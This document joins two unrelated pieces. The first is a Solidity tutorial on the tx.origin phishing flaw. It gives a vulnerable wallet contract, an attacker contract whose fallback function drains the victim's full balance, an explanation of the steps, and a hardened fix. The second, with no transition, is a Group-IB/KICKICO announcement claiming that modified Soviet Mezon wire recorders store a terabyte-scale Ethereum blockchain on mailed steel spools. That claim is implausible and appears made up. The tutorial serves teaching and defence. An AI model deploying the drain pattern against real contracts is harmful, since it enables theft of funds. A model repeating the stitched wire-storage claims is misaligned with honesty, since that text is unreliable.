A transaction origin attack is a form of phishing attack that can drain a contract of all its funds.
Points of failure
- Using address.call.value(amount)() to transfer ether
- Checking the identity of the owner of a contract using tx.origin
Contracts
TxOriginVictim is a wallet-type smart contract.
pragma solidity ^0.4.18;

contract TxOriginVictim {
    address owner;

    function TxOriginVictim() public {
        owner = msg.sender;
    }

    // Vulnerable: authorisation relies on tx.origin (the key that started the
    // transaction) instead of msg.sender (the immediate caller).
    function transferTo(address to, uint amount) public {
        require(tx.origin == owner);
        to.call.value(amount)();
    }

    function() payable public {}
}
TxOriginAttacker is the contract that will be used by the attacker.
pragma solidity ^0.4.18;

interface TxOriginVictim {
    function transferTo(address to, uint amount) external;
}

contract TxOriginAttacker {
    address owner;

    function TxOriginAttacker() public {
        owner = msg.sender;
    }

    function getOwner() public view returns (address) {
        return owner;
    }

    // Fallback: runs when the victim wallet sends ether here. At this point
    // msg.sender is the victim contract, while tx.origin is still the victim's owner.
    function() payable public {
        TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
    }
}

1. The user transfers ether from their smart contract wallet to the address of the TxOriginAttacker contract.
2. The ether hits the TxOriginAttacker contract and its fallback function is called, triggering: TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance)
3. The fallback function “poses” as TxOriginVictim, using its address (msg.sender) to transfer all of the funds (msg.sender.balance) to the owner of the TxOriginAttacker contract.
4. This works because the TxOriginVictim contract checks tx.origin, NOT msg.sender.
5. tx.origin is the original sender of a transaction; msg.sender is the immediate sender.
6. Since the call is relayed through the TxOriginVictim contract's address, the attacker can call the transferTo() function “posing” as the TxOriginVictim contract and pass msg.sender.balance (the entire balance of the sender) as the amount argument, thereby draining the contract of all funds.
Solutions
- Never use tx.origin to check authorisation of ownership; use msg.sender instead.
- Don’t use address.call.value(amount)(); use address.transfer() instead.
- address.transfer() forwards a gas stipend of only 2300, meaning a possible attacking contract would not have enough gas for any further computation other than emitting events.
- address.transfer() also throws on failure.
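As an added example (not part of the original article), here is the wallet contract above rewritten with both fixes applied: ownership is checked against msg.sender, and ether leaves through transfer(). The contract name TxOriginSafeWallet and the Withdrawal event are assumptions for illustration.

```solidity
pragma solidity ^0.4.18;

// Added hardened version of TxOriginVictim (example code, not from the original post).
contract TxOriginSafeWallet {
    address public owner;

    event Withdrawal(address indexed to, uint amount);

    function TxOriginSafeWallet() public {
        owner = msg.sender;
    }

    // Only the immediate caller is checked. When an attacker contract relays a
    // call on the owner's behalf, msg.sender is that contract, so this fails
    // even though tx.origin would still be the owner's key.
    modifier onlyOwner() {
        require(msg.sender == owner);
        _;
    }

    function transferTo(address to, uint amount) public onlyOwner {
        require(amount <= this.balance);
        // transfer() forwards only the 2300 gas stipend and throws on failure,
        // so a receiving contract cannot do anything beyond emitting an event.
        to.transfer(amount);
        Withdrawal(to, amount);
    }

    function() payable public {}
}
```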
Group-IB, an international company specializing in cyberattack prevention, has recently become closely involved in providing security for ICO projects. The ICO industry is a very sensitive business prone to intrusions and hacking; according to a joint report by Ernst & Young and Group-IB, in 2017 almost $400 million of the $3.7 billion raised (about 10%) was stolen or lost.
By using Group-IB’s Threat Intelligence technologies, we discovered that a hacker group was actively recruiting computer experts with proficiency in big data, machine learning, cryptography, and blockchain in the Darknet. Through analysis of this activity and profiles of invited specialists, Group-IB analysts have concluded that the group is likely preparing attacks on a number of cryptocurrency projects, including KICKICO.
KICKICO has united its forces with Group-IB to develop and apply the necessary countermeasures. The conventional ones are Group-IB’s unsurpassed GIB-Crypto service, which is essentially a comprehensive cybersecurity offering for ICOs, cryptocurrency wallets and exchanges, as well as anti-phishing solutions. Today we are thrilled to report that there will be unconventional countermeasures as well.
KICKICO specialists have designed a way to keep the blockchain safe and undamaged in case of an attack of any magnitude and destructive force: literally, on hard media. To address the issue, the KICKICO Research Team has reached back to secret USSR developments dating from the Cold War and decided to apply Soviet spy technology that makes it possible to record and store the blockchain, literally using magnetic recording.
The Soviets designed a lot of spy tech during the 1960s–1970s, including a portable spy wire recording device called Mezon. KICKICO technicians were able to modify Mezon to record data instead of voice audio on a thin 0.05 mm steel wire. The standard wire spool was enough to record one hour of voice audio, and an upgraded version of the machine (Mezon 2018) is capable of recording and storing up to 1TB of data, which is enough for the entire Ethereum blockchain file in its current state.

KICKICO plans to record the blockchain file on wire spools and then distribute those wire spools among holders of KICKCOIN. Coin holders will be able to choose between DHL, UPS, Russian Post or their preferred local delivery service.
This method has several important security features:
(i) Those records will be literal hardware copies of the blockchain in storage, not accessible from the Internet and not compatible with present-day digital technology;
(ii) The data on the wire spool will be further encrypted, and the encoding method is a proprietary one, jointly developed by the two companies’ research teams;
(iii) Even if stolen, those wire spools will not be of any use to the criminals since they will not have a device to play the wire spool (all Mezons have been quietly bought out of the market and are currently stored privately by a number of crypto enthusiasts);
(iv) The magnetic wire retains its magnetic recording in a very wide range of temperatures, from -50 °C to +650 °C. That means that these blockchain wire spools are frost and heat-proof;
(v) This method will be used as a last resort to be able to back up the blockchain in case of a serious emergency, including nuclear attacks. At least three copies are destined to extremely distant and isolated locations in mid-Pacific and Latin America.
Once the dangerous phase is over, one of the holders will have to send her or his wire spool to KICKICO. The Research Team will then load the wire into the recorder and get the data back online.
“We believe that it is essential to protect existing blockchain records from all threats at all possible levels, and the proposed solution implements a rare combination of old-school data storage techniques and cutting-edge cryptography technologies,” says Ruslan Yusufov, Head of Group-IB ICO and Blockchain protection division.
“We are proud that the combined efforts of the strongest cyberattack prevention company and the best blockchain and ICO community have made this possible. Mezon 2018 allows mankind to establish a safe house for all key blockchains and cryptocurrencies,” says Alexander Petrov, KICKICO early investor and blockchain evangelist.
